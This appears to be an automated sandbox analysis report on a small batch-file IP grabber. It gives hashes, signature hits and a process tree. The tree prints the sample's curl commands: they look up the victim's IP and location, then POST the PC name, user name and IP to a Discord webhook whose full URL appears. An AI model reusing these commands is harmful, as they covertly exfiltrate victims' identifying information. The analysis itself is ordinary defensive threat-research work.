Analysis
-
max time kernel
84s -
max time network
124s -
platform
windows11-21h2_x64 -
resource
win11-20240214-en -
resource tags
arch:x64arch:x86image:win11-20240214-enlocale:en-usos:windows11-21h2-x64system -
submitted
28/03/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
ipgrabb1er.bat
Resource
win11-20240214-en
3 signatures
150 seconds
General
-
Target
ipgrabb1er.bat
-
Size
1KB
-
MD5
24e441ba68d62ccc6eae517dd7232bc3
-
SHA1
b5331cabd71251761f0b632cc8087f915d21ee5a
-
SHA256
39e9b37f561abc6eeea56735f329ab12014aa9d5f45fdaf36703549a49696267
-
SHA512
bb2366ffdec92e78a0537a3f75d0d1f17182f809e687b1fc8d2f8fba250278a4e9cd7b07f61efd68fa8440fd06138cb48841a5a876a031c868373e5b28d9aa3a
Score
6/10
Malware Config
Signatures
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 13 discord.com 1 discord.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 api64.ipify.org 2 api64.ipify.org 6 ipinfo.io 10 ipinfo.io -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2464 wrote to memory of 3136 2464 cmd.exe 77 PID 2464 wrote to memory of 3136 2464 cmd.exe 77 PID 3136 wrote to memory of 604 3136 cmd.exe 78 PID 3136 wrote to memory of 604 3136 cmd.exe 78 PID 3136 wrote to memory of 4924 3136 cmd.exe 79 PID 3136 wrote to memory of 4924 3136 cmd.exe 79 PID 2464 wrote to memory of 4572 2464 cmd.exe 80 PID 2464 wrote to memory of 4572 2464 cmd.exe 80 PID 4572 wrote to memory of 3820 4572 cmd.exe 81 PID 4572 wrote to memory of 3820 4572 cmd.exe 81 PID 4572 wrote to memory of 1184 4572 cmd.exe 82 PID 4572 wrote to memory of 1184 4572 cmd.exe 82 PID 2464 wrote to memory of 4364 2464 cmd.exe 83 PID 2464 wrote to memory of 4364 2464 cmd.exe 83
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ipgrabb1er.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -s "https://api64.ipify.org?format=json" | findstr /r /c:"\"ip\":"2⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Windows\system32\curl.execurl -s "https://api64.ipify.org?format=json"3⤵PID:604
-
-
C:\Windows\system32\findstr.exefindstr /r /c:"\"ip\":"3⤵PID:4924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -s "https://ipinfo.io/{"ip":"89.149.23.59"}/json" | findstr /i "city region country"2⤵
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Windows\system32\curl.execurl -s "https://ipinfo.io/{"ip":"89.149.23.59"}/json"3⤵PID:3820
-
-
C:\Windows\system32\findstr.exefindstr /i "city region country"3⤵PID:1184
-
-
-
C:\Windows\system32\curl.execurl -X POST -H "Content-Type: application/json" -d "{ \"content\": \"PC Name: VWSKOMFM\\User Account Name: Admin\\IP Address: {"ip":"89.149.23.59"}\\Location: \" }" https://discord.com/api/webhooks/1222730303299129455/C-jlNtX8rSs6pyYUKNodg2N2Jhdmf4Yw1PhKn4b6292btwdZrdU8l6wWN1dbklKjw-072⤵PID:4364
-